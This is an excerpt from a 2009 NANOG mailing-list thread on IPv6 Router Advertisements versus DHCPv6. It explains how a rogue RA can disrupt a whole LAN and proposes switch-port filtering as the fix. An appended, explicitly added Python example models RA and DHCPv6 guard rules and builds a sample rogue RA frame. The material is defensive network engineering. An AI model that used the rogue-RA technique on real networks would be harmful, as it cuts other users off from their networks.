but who clearly do not do this in IPv4. That seems strange, to me.


--
Nathan Ward




Re: IPv6 Confusion

2009-02-18 Thread Nathan Ward

On 19/02/2009, at 9:42 AM, sth...@nethelp.no wrote:


2) Some end-node box with an IPv6 stack from Joe's Software Emporium and
Bait-n-Tackle sees an RA packet, and concludes that since RA and DHCPv6
are mutually exclusive, to ignore any DHCPv6 packets it sees, and hilarity
ensues.



They are not mutually exclusive, DHCPv6 *requires* RA.


In your previous Nanog message you said:


DHCPv6 can operate without RA now.


Please make up your mind.



You are right, sorry for any confusion, I will clarify my comments.

DHCPv6 can operate without RA, but you cannot get default route  
information right now. I believe there is a draft to add this option  
though.


In most networks this is not practical, as many hosts with a DHCPv6  
stack will send DHCPv6 requests only when RA messages tell them to use  
a DHCPv6 server.


The DHCPv6 protocol does not require RA, however practical  
implementation of DHCPv6 for address assignment does.


Better? :-)

--
Nathan Ward




Re: IPv6 Confusion

2009-02-18 Thread Nathan Ward

On 19/02/2009, at 9:53 AM, Leo Bicknell wrote:

In a message written on Thu, Feb 19, 2009 at 09:44:38AM +1300,  
Nathan Ward wrote:

I guess you don't use DHCP in IPv4 then.


No, you seem to think the failure mode is the same, and it is not.

Let's walk through this:

1) 400 people get on the NANOG wireless network.

2) Mr 31337 comes along and puts up a rogue DHCP server.

3) All 400 people continue working just fine until their lease expires,
   which is likely after the conference ends.

   The 10 people who came in late get info from the rogue server, and
   troubleshooting ensues.

Let's try with IPv6.

1) 400 people get on the NANOG wireless network.

2) Mr 31337 sends a rogue RA.

3) 400 people instantly lose network access.

   The 10 who come in late don't even bother to try and get on.

So, with DHCP handing out a default route we have 10/400 down, with RA's
we have 410/410 down.  Bravo!

Let me clear up something from the start; this is not security.  If
security is what you are after none of the solutions proffered so
far work.  Rather this is robust network design.  A working device
shouldn't run off and follow a new router in milliseconds like a
lost puppy looking for a treat.

This actually offers a lot of protection from stupidity though.  Ever
plug an IPv4 router into the wrong switch port accidentally?  What
happened?  Probably nothing; no one on the LAN used the port IP'ed in
the wrong subnet.  They ignored it.

Try that with an IPv6 router.  About 10 ms after you plug into the wrong
port out goes an RA, the entire subnet ceases to function, and your
phone lights up like a christmas tree.

Let me repeat, none of these solutions are secure.  The IPv4/DHCP model
is ROBUST, the RA/DHCPv6 model is NOT.



Yup, understood.

The point I am making is that the solution is still the same -  
filtering in ethernet devices.


Perhaps there needs to be something written about detailed  
requirements for this so that people have something to point their  
switch/etc. vendors at when asking for compliance. I will write this  
up in the next day or two. I guess IETF is the right forum for  
publication of that.


Is there something like this already that anyone knows of?

--
Nathan Ward
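The switch-side filtering proposed earlier in this thread (only deliver frames for the all-routers and all-DHCPv6-agents groups to ports that have such devices, and, where the switch can look at IPv6 L4, only accept RAs from router ports and DHCPv6 server messages from server or relay ports) and referred back to in the reply above, as an added example that is not part of the original posts. It is a Python model of the two policies over raw Ethernet/IPv6 frames, not a configuration for any vendor; the per-port "role" tags, the hop limit of 255 and the sample frames (no checksums, documentation-style addresses) are constructed for illustration. Extension headers are deliberately not walked: a frame that hides ICMPv6 behind one is reported as "other", and a strict ACL should drop rather than pass that.

```python
import ipaddress
import struct

# RFC 2464 multicast MAC mapping, RFC 4861 RA type, RFC 3315 DHCPv6 ports.
ETHERTYPE_IPV6 = 0x86DD
NH_UDP, NH_ICMPV6 = 17, 58
ICMPV6_ROUTER_ADVERTISEMENT = 134
DHCPV6_SERVER_PORT, DHCPV6_CLIENT_PORT = 547, 546
ALL_NODES_MAC = bytes.fromhex("333300000001")         # ff02::1
ALL_ROUTERS_MAC = bytes.fromhex("333300000002")       # ff02::2
ALL_DHCP_AGENTS_MAC = bytes.fromhex("333300010002")   # ff02::1:2

# Assumption of this example: the operator tags each switch port with what
# is plugged into it.  Relays usually live on routers, hence the overlap.
ROUTER_ROLES = {"router"}
DHCPV6_SERVER_ROLES = {"dhcpv6_server", "router"}


def build_frame(dst_mac, dst_ip, next_header, body):
    """Constructed Ethernet + IPv6 frame (no checksums; sample data only)."""
    src_mac = bytes.fromhex("0200000000aa")
    src_ip = ipaddress.IPv6Address("fe80::aa").packed
    ip_header = (struct.pack("!IHBB", 0x60000000, len(body), next_header, 255)
                 + src_ip + dst_ip)
    return dst_mac + src_mac + struct.pack("!H", ETHERTYPE_IPV6) + ip_header + body


def classify(frame):
    """'ra', 'dhcpv6_server', 'dhcpv6_client' or 'other'."""
    if len(frame) < 54 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV6:
        return "other"
    next_header = frame[14 + 6]           # IPv6 Next Header field
    body = frame[54:]                     # first upper-layer header
    if next_header == NH_ICMPV6 and body and body[0] == ICMPV6_ROUTER_ADVERTISEMENT:
        return "ra"
    if next_header == NH_UDP and len(body) >= 8:
        sport, dport = struct.unpack("!HH", body[:4])
        if sport == DHCPV6_SERVER_PORT:
            return "dhcpv6_server"        # Advertise/Reply from a server or relay
        if dport == DHCPV6_SERVER_PORT:
            return "dhcpv6_client"        # Solicit/Request towards ff02::1:2
    return "other"


def ingress_permitted(frame, port_role):
    """L4 ACL variant: RAs only from router ports, DHCPv6 server messages only
    from server/relay ports; everything else is left alone."""
    kind = classify(frame)
    if kind == "ra":
        return port_role in ROUTER_ROLES
    if kind == "dhcpv6_server":
        return port_role in DHCPV6_SERVER_ROLES
    return True


def egress_permitted(frame, port_role):
    """L2 variant: frames for the all-routers / all-DHCP-agents groups are
    only delivered to ports where such a device lives, so a rogue never sees
    the solicitations it would answer.  An unsolicited RA to ff02::1 is not
    caught here, which is why the L4 ACL above is the stronger control."""
    dst_mac = frame[:6]
    if dst_mac == ALL_ROUTERS_MAC:
        return port_role in ROUTER_ROLES
    if dst_mac == ALL_DHCP_AGENTS_MAC:
        return port_role in DHCPV6_SERVER_ROLES
    return True


# Constructed sample frames.
RA_BODY = bytes([ICMPV6_ROUTER_ADVERTISEMENT, 0]) + bytes(14)   # minimal RA header
ROGUE_RA = build_frame(ALL_NODES_MAC, ipaddress.IPv6Address("ff02::1").packed,
                       NH_ICMPV6, RA_BODY)
DHCPV6_ADVERTISE = build_frame(bytes.fromhex("020000000001"),
                               ipaddress.IPv6Address("fe80::1").packed, NH_UDP,
                               struct.pack("!HHHH", 547, 546, 12, 0) + bytes([2, 0, 0, 1]))
DHCPV6_SOLICIT = build_frame(ALL_DHCP_AGENTS_MAC,
                             ipaddress.IPv6Address("ff02::1:2").packed, NH_UDP,
                             struct.pack("!HHHH", 546, 547, 12, 0) + bytes([1, 0, 0, 1]))

if __name__ == "__main__":
    for name, frame in (("RA", ROGUE_RA), ("DHCPv6 Advertise", DHCPV6_ADVERTISE),
                        ("DHCPv6 Solicit", DHCPV6_SOLICIT)):
        for role in ("client", "dhcpv6_server", "router"):
            print(f"{name:17} from {role:13} port: ingress={ingress_permitted(frame, role)!s:5} "
                  f"egress={egress_permitted(frame, role)}")
```

Run against the three sample frames, the L2 rule alone still lets the rogue RA reach every client port (its destination is the all-nodes group), so the failure mode Leo describes is only closed by the per-port L4 rule that ties ICMPv6 type 134 to the router ports.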



